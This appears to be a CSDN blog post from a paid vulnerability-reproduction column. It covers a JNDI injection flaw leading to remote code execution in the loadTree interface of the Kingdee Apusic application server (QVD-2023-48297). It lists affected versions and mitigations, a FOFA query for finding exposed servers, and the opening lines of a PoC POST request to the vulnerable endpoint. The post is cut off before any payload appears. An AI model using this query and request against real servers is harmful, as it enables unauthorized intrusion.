金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297)

最新推荐文章于 2024-04-09 17:47:34 发布

0xSecl

最新推荐文章于 2024-04-09 17:47:34 发布

阅读量2.6k

点赞数 27

分类专栏：漏洞复现文章标签：安全 web安全

本文链接：https://blog.csdn.net/qq_41904294/article/details/135159813

版权

871 篇文章 1430 订阅 ¥9.90 ¥99.00

订阅专栏

本文介绍了金蝶Apusic应用服务器的loadTree接口存在的JNDI注入漏洞，该漏洞可能导致远程代码执行。受影响版本为V9.0 SP7及以下，建议用户立即安装官方发布的补丁或采取缓解措施，如停用管理控制台、删除相关文件，并限制访问来源。

摘要由CSDN通过智能技术生成

金蝶Apusic应用服务器是一款企业级应用服务器，支持Java EE技术，适用于各种商业环境。

由于金蝶Apusic应用服务器权限验证不当，导致攻击者可以向loadTree接口执行JNDI注入，造成远程代码执行漏洞。利用该漏洞需低版本JDK。（漏洞比较旧，8月份补丁已出，金蝶EAS也存在类似漏洞，只是路径不一样）

影响版本

金蝶Apusic应用服务器 <= V9.0 SP7

不受影响版本

金蝶Apusic应用服务器 > V9.0 SP7

FOFA：app="Apusic应用服务器"

PoC

POST /admin//protect/jndi/loadTree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;

了解本专栏

关注

专栏目录